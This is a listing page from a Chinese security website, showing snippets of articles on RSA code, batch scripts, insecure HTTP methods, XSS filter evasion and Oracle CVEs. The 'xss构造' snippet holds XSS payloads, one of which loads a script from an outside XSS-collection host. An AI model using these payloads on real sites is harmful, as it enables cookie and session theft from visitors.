安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
逆向工程 ExploitS 系统文档 移动安全 硬件安全 无线安全 WEB安全 DataBase 神兵利刃 网络安全 编程茶楼 WooYun
返回首页
当前位置: 安云网 > 技术关注 >
  • [编程茶楼] 用指定的n,e,d生成RSA的数据结构 日期::2017-07-21点击:170 好评:0

    代码包括 1。生成RSA的数据结构 2。用指定的n,e,d生成RSA的数据结构 3。用私钥加密 4。用公钥解密 5。SHA256报文摘要 #include stdio.h #include stdlib.h #include string.h #include openssl/sha.h #include openssl/rsa.h void testRSAGen(){ RSA *r; int bits=512,ret; unsig...

  • [Python] python实现RSA加密解密方法 日期::2017-07-15点击:322 好评:0

    本文主要介绍在Windows+python2.7环境下实现RSA 加密 解密 。 方法一:使用 M2Crypto 1. 安装 M2Crypto M2Crypto库本身在windows下 安装 比较麻烦,但这里我们使用大神打包好的 安装 包^^。 点击下载M2Crypto百度网盘地址 a. 根据你的系统不同下载...

  • [系统文档] 一个批处理获取硬盘盘符的问题 日期::2017-07-12点击:117 好评:0

    @echo off setlocal enabledelayedexpansion for /f delims=\ %%i in (fsutil fsinfo drives^|more) do ( set var=%%i set drive=!var:~-2! fsutil fsinfo drivetype !drive!|find 固定nul echo !drive! )a.txt pause 在xp下正常获取所有盘符。 在win7就不正常了? 回答 : @echo off for %%p in (a...

  • [系统文档] 启用了不安全的HTTP方法 日期::2017-07-11点击:83 好评:0

    安全风险: 可能会在Web 服务器上上载、修改或删除Web 页面、脚本和文件。 可能原因: Web 服务器或应用程序服务器是以不安全的方式配置的。 修订建议: 如果服务器不需要支持WebDAV,请务必禁用它,或禁止不必要的HTTP 方法。...

  • [网络安全] xss构造 日期::2017-07-10点击:135 好评:0

    svg/onload=s=createElement(script);body.appendChild(s);s.src=url; body/onpageshow=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.tttt.me%2FneKXvH%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName...

  • [网络安全] XSS 绕过过滤器大全 日期::2017-06-16点击:184 好评:0

    XSS Filter Evasion Cheat Sheet 介绍(Introduction): 翻译:落泪红尘 r00ts www.sh3llc0de.com 翻译了一点,有时间再全部翻译 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 这篇文章是协助应用程序安全专业人...

  • [WooYun-Drops] Bypass xss过滤的测试方法 日期::2017-06-15点击:62 好评:0

    0x00 背景 本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽说是绕WAF的,但...

  • [系统文档] HTML5 Audio时代的MIDI音乐文件播放 日期::2017-06-13点击:149 好评:0

    大家都知道,HTML5 Audio标签能够支持wav, webm, mp3, ogg, acc等格式,但是有个很重要的音乐文件格式midi(扩展名mid)却在各大浏览器中都没有内置的支持,因为mid文件并不像其他声音文件那样记录声音的采样信息,而是记录了乐器的演奏...

  • [漏洞分享] Oracle数据库漏洞分析:CVE-2012-1675和CVE-2012-3137 日期::2017-06-06点击:151 好评:0

    摘要 一般性的 数据库 漏洞,都是在成功连接或登录数据库后实现入侵;本文介绍两个在2012年暴露的 Oracle 漏洞,通过这两种漏洞的结合,可以在不掌握用户名/密码的情况下入侵Oracle,从而完...

  • [漏洞分享] Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)的完美解决方法, 日期::2017-06-06点击:166 好评:0

    环境:Windows 2008 R2 + Oracle 10.2.0.3 应用最新bundle patch后,扫描依然报出漏洞 Oracle Database Server TNS Listener远程数据投毒漏洞(CVE-2012-1675) •1.确定解决方案 •2.应用解决方案 •3.验证修补情况 •4.Reference 1.确定解决方案 安全厂家给出...

  • 首页
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 下一页
  • 末页
  • 4814806
推荐内容